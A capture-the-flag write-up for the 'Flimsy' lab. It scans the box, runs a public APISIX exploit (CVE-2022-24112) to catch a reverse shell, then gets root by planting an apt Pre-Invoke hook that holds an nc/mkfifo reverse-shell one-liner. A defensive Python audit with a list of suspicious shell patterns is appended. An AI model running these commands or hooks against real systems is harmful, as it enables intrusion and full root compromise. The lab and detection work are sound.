# Proving grounds Play: Flimsy

Proving grounds Practice - Flimsy CTF writeup.

### Nmap

```
PORT      STATE SERVICE             VERSION
22/tcp    open  ssh                 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
|   256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_  256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp    open  http                OpenResty web app server 1.21.4.1
|_http-title: Welcome to OpenResty!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: openresty/1.21.4.1
3306/tcp  open  mysql               MySQL (unauthorized)
9443/tcp  open  ssl/tungsten-https?
43500/tcp open  http                OpenResty web app server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-server-header: APISIX/2.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### 43500/tcp open http - OpenResty web app server

```
HTTP/1.1 404 Not Found
Date: Fri, 06 Oct 2023 02:42:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Server: APISIX/2.8
```

**http-server-header: APISIX/2.8** The `Server` header discloses the service name and version, APISIX 2.8, which is vulnerable to [Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829) (CVE-2022-24112).

**Exploitation**

```sh
naveenj@hackerspace:|22:26|~/proving_grounds/Flimsy/exploit$ python exploit.py http://192.168.211.220:43500/ 192.168.45.250 4444

                                   .     , 
        _.._ * __*\./ ___  _ \./._ | _ *-+-
       (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
          |                     |          

		(CVE-2022-24112)
{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }
```

Netcat Listening...

```sh
naveenj@hackerspace:|22:25|~/proving_grounds/Flimsy/exploit$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.250] from (UNKNOWN) [192.168.211.220] 54406
python -c 'import pty; pty.spawn("/bin/bash")'
franklin@flimsy:/root$ 
```

**Initial Foothold Obtained**

### Privilege Escalation

Download linpeas.sh to the vulnerable machine and run it. The script shows that the current user has write permission on the directory `/etc/apt/apt.conf.d`, which allows us to escalate privileges: apt reads every configuration fragment in that directory, so a file dropped there can register a hook command that apt executes as root.

```sh
franklin@flimsy:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.250 4444 >/tmp/f"};' > shell
franklin@flimsy:/etc/apt/apt.conf.d$ 
```

Wait a few seconds: when the root cron job runs apt, apt reads our fragment and executes the Pre-Invoke hook as root, giving us a reverse shell as root.

```sh
naveenj@hackerspace:|22:31|~/proving_grounds/Flimsy$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.250] from (UNKNOWN) [192.168.211.220] 54730
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# 
```

**Root Obtained**
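The misconfiguration abused above is easy to audit from the defender's side. The following script is an added example, not part of the original writeup: it flags an `/etc/apt/apt.conf.d` directory or fragment that a non-root user owns or can write, and parses each fragment for `Pre-Invoke`/`Post-Invoke` directives whose command looks like a shell. The `demo()` function builds a constructed sample in a temporary directory (the hook from this writeup with a placeholder IP next to a benign fragment) and runs the audit on it; the `trusted_uid` parameter is an assumption of this example so that the sample is judged on mode bits regardless of who runs it.

```python
import os
import re
import tempfile
from pathlib import Path

# apt runs the quoted command(s) of these directives as root around `apt update`/dpkg.
HOOK_RE = re.compile(r"\b(?:APT|DPkg)::(?:Update::)?(?:Pre|Post)-Invoke(?:-Success)?\b", re.I)
QUOTED_RE = re.compile(r'"([^"]*)"')
SUSPICIOUS = ("mkfifo", "/bin/sh", "/bin/bash", "nc ", "/dev/tcp", "bash -i")  # tune per fleet

def weak_perms(p: Path, trusted_uid: int = 0) -> bool:
    """True if someone other than trusted_uid owns p, or group/other may write it (0o022)."""
    st = p.stat()
    return st.st_uid != trusted_uid or bool(st.st_mode & 0o022)

def directive_value(text: str, start: int) -> str:
    """Slice of text from start up to the first ';' outside double quotes."""
    in_quote = False
    for i in range(start, len(text)):
        if text[i] == '"':
            in_quote = not in_quote
        elif text[i] == ";" and not in_quote:
            return text[start:i]
    return text[start:]

def audit_apt_conf_dir(conf_dir="/etc/apt/apt.conf.d", trusted_uid=0):
    """Return [(path, reason)] for weak permissions and shell-like hook commands."""
    d = Path(conf_dir)
    findings = [(str(d), "directory writable by non-root: any dropped hook runs as root")] if weak_perms(d, trusted_uid) else []
    for f in sorted(p for p in d.iterdir() if p.is_file()):
        if weak_perms(f, trusted_uid):
            findings.append((str(f), "config fragment writable by non-root"))
        text = f.read_text(errors="replace")
        for m in HOOK_RE.finditer(text):
            for cmd in QUOTED_RE.findall(directive_value(text, m.end())):
                if any(s in cmd for s in SUSPICIOUS):
                    findings.append((str(f), f"suspicious {m.group(0)} hook: {cmd}"))
    return findings

def demo():
    """Constructed sample: one benign fragment plus the hook from this writeup (placeholder IP)."""
    d = Path(tempfile.mkdtemp())
    files = {"20auto-upgrades": ('APT::Periodic::Update-Package-Lists "1";\n', 0o644),
             "shell": ('apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f"};\n', 0o666)}
    for name, (content, mode) in files.items():
        (d / name).write_text(content)
        (d / name).chmod(mode)  # 0o666: a world-writable hook, as franklin could create on Flimsy
    d.chmod(0o777)  # mirrors the franklin-writable directory linpeas reported
    return audit_apt_conf_dir(d, trusted_uid=os.getuid())  # runner's uid: judge on mode bits only
```

Run `audit_apt_conf_dir()` with no arguments as root on a real host; an empty list means the directory and its fragments are root-owned, not group/world writable, and carry no shell-like hooks.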

### Reference

* <https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/>

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).
